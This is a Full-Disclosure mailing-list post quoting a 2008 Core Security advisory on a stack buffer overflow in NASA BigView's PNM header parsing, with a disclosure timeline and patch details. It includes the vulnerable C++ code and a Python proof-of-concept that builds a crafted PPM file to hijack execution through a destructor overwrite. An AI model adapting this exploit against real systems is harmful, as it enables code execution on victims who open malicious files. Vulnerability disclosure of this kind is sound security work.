Take this, Luigi "no fix" Auriemma!
CORE Security Technologies Advisories wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Core Security Technologies - CoreLabs Advisory > http://www.coresecurity.com/corelabs/ > > NASA BigView Stack Buffer Overflow > > > *Advisory Information* > > Title: NASA BigView Stack Buffer Overflow > Advisory ID: CORE-2008-0425 > Advisory URL: http://www.coresecurity.com/?action=item&id=2304 > Date published: 2008-06-04 > Date of last update: 2008-06-03 > Vendors contacted: NASA Ames Research Center > Release mode: Coordinated release > > > *Vulnerability Information* > > Class: Stack Overflow > Remotely Exploitable: Yes (client side) > Locally Exploitable: No > Bugtraq ID: 29517 > CVE Name: CVE-2008-2542 > > > *Vulnerability Description* > > NASA BigView [1] allows for interactive panning and zooming of images of > arbitrary size on desktop PCs running Linux. Using this software, one > can explore (on relatively modest machines) images such as the Mars > Orbiter Camera mosaic [92160x33280 pixels]. > > The BigView package suffers from a stack buffer overflow when parsing > specially crafted (invalid) PNM input files. If successful, a malicious > third party could trigger execution of arbitrary code within the context > of the application, or otherwise crash the whole application. The > vulnerability is caused due to the BigView package not properly checking > the line length of the ascii PNM input files before copying it on a > stack buffer. This can be exploited to get arbitrary code execution by > opening a specially crafted file. > > Exploitation of the PNM overflow problem requires the user to explicitly > open a malicious file. The user should refrain from opening files from > untrusted third parties or accessing untrusted Web sites until the patch > is applied. > > > *Vulnerable Packages* > > . BigView revision 1.8. > . Older BigView versions could be affected too, but they were not tested. > > > *Non-vulnerable Packages* > > . Available through BigView website (since June 2nd 2008, see below). > > > *Vendor Information, Solutions and Workarounds* > > The NASA BigView team has published a new version fixing this > vulnerability. The tarball is available on BigView's website: > http://opensource.arc.nasa.gov/project/bigview/ > > > *Credits* > > This vulnerability was discovered and researched by Alfredo Ortega, from > CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies. > > > *Technical Description / Proof of Concept Code* > > The BigView package suffers from a stack buffer overflow when parsing > specially crafted (invalid) PNM input files. If successful, a malicious > third party could trigger execution of arbitrary code within the context > of the application, or otherwise crash the whole application. > > The vulnerability resides in the following code at 'Ppm/ppm.C'. Here, > the function 'getline()' reads data from a file into a buffer. This is > the complete function: > > /----------- > > 418 static void getline(int fin, char* lineBuf, int len) > 419 { > 420 bool done=false; > 421 int index=0; > 422 lineBuf[index]=' '; > 423 while(! done){ > 424 lineBuf[index] = getOneChar(fin); > 425 if( lineBuf[index]==10 ) { > 426 lineBuf[index]=0; > 427 done=true; > 428 } > 429 ++index; > 430 } > 431 lineBuf[index]=0; > 432 } > > - -----------/ > > Clearly the function requires the length of the destination buffer, but > it is never used internally. This function is used on the > 'PPM::ppmHeader()' function, to read the header of the PPM file. > > /----------- > > 56 PPM::ppmHeader(string filename, PPM::Format* format, > 57 int* cpp, int* bpc, > 58 int* sizeX, int* sizeY, > 59 int* imageOffset) > 60 { > 61 std::ostringstream err; > 62 char magic[3],lineBuf[512],junk; > 63 int res,max; > . > . > . > 115 while( junk == '#' ){ > 116 getline(fin,lineBuf,512); > 117 cout << "Comment:"<<lineBuf<<":"<<endl; > 118 junk = getOneChar(fin); > 119 } > > - -----------/ > > Here, the 'lineBuf' buffer is allocated on the stack, with a size of 512 > bytes. If the PPM contains a line longer than 512 bytes on the header, a > buffer overflow will ensue. The following proof of concept is a python > script that creates a PNM file that triggers the overflow and jumps to > an arbitrary position (0x41414141 on the PoC) when loaded with BigView > compiled on Ubuntu 6.06 LTS. > > /----------- > > ## BigView exploit > ## Alfredo Ortega - Core Security Exploit Writers Team (EWT) > ## Works against BigView "browse" revision 1.8 compiled on ubuntu 6.06 > Desktop i386 > > import struct > w = open("crash.ppm","wb") > w.write("""P3 > #CREATOR: The GIMP's PNM Filter Version > 1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""") > # This exploit is not trivial, because the function PPM::ppmHeader() > doesn't return inmmediately, and we must modify internal variables to > cause an overwrite of a C++ string destructor executed at the end of the > function to gain control of EIP > # PS.: Congrats for the Phoenix mars Lander! > for i in range(7): > w.write(chr(i)*4) > w.write("AA") > w.write(struct.pack("<L",0xaaaaaaaa)) > w.write(struct.pack("<L",0xbbbbbbbb)) > w.write(struct.pack("<L",0xcccccccc)) > w.write(struct.pack("<L",0x08080000)) > w.write(struct.pack("<L",0x08080000)*48) > > #The address of the destructor is hard-coded. Sorry but this is only a PoC! > destination = 0x0805b294 # destructor > value = 0x41414141 #address to jump to > w.write(struct.pack("<L",destination)) # destination > > w.write(""" > %d 300 > 255 > 255 > 255 > 255 > """ % value) > w.close() > > - -----------/ > > > *Report Timeline* > > . 2008-04-24: > Initial contact email sent by Core to BigView team setting the estimated > publication date of the advisory to May 19th. > > . 2008-04-28: > Vendor acknowledges the email notification. > > . 2008-04-30: > Core sends the advisory draft to BigView support team. No reply received. > > . 2008-05-12: > New email sent to BigView asking for a response. No reply received. > > . 2008-05-15: > New email sent to BigView asking for a response. > > . 2008-05-15: > BigView support team informs us that a new patched version is ready, but > is not yet available via BigView webpage. > > . 2008-05-19: > Core does not release the advisory (as planned). > > . 2008-05-19: > New email sent to BigView team asking if the fixed version is available > to the users. > > . 2008-05-26: > New email sent to BigView team, refreshing the communications that took > place, and asking for an answer. > > . 2008-06-02: > Vendor responds that a tarball with fixes has been published on > BigView's website. > > . 2008-06-03: > Core sends the final version of the advisory to the BigView team. > > . 2008-06-04: > CORE-2008-0425 advisory is published. > > > *References* > > [1] http://opensource.arc.nasa.gov/project/bigview/ > > > *About CoreLabs* > > CoreLabs, the research center of Core Security Technologies, is charged > with anticipating the future needs and requirements for information > security technologies. We conduct our research in several important > areas of computer security including system vulnerabilities, cyber > attack planning and simulation, source code auditing, and cryptography. > Our results include problem formalization, identification of > vulnerabilities, novel solutions and prototypes for new technologies. > CoreLabs regularly publishes security advisories, technical papers, > project information and shared software tools for public use at: > http://www.coresecurity.com/corelabs/. > > > *About Core Security Technologies* > > Core Security Technologies develops strategic solutions that help > security-conscious organizations worldwide develop and maintain a > proactive process for securing their networks. The company's flagship > product, CORE IMPACT, is the most comprehensive product for performing > enterprise security assurance testing. CORE IMPACT evaluates network, > endpoint and end-user vulnerabilities and identifies what resources are > exposed. It enables organizations to determine if current security > investments are detecting and preventing attacks. Core Security > Technologies augments its leading technology solution with world-class > security consulting services, including penetration testing and software > security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core > Security Technologies can be reached at 617-399-6980 or on the Web at > http://www.coresecurity.com. > > > *Disclaimer* > > The contents of this advisory are copyright (c) 2008 Core Security > Technologies and (c) 2008 CoreLabs, and may be distributed freely > provided that no fee is charged for this distribution and proper credit > is given. > > > *GPG/PGP Keys* > > This advisory has been signed with the GPG key of Core Security > Technologies advisories team, which is available for download at > http://www.coresecurity.com/files/attachments/core_security_advisories.asc. > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.7 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iD8DBQFIRu4lyNibggitWa0RAljKAJ4iVfRGNB6Hz+tA6DKFqpovws/cwACfSBFF > a9ffEcKqAre7M1jXT9OpHOg= > =UCFz > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/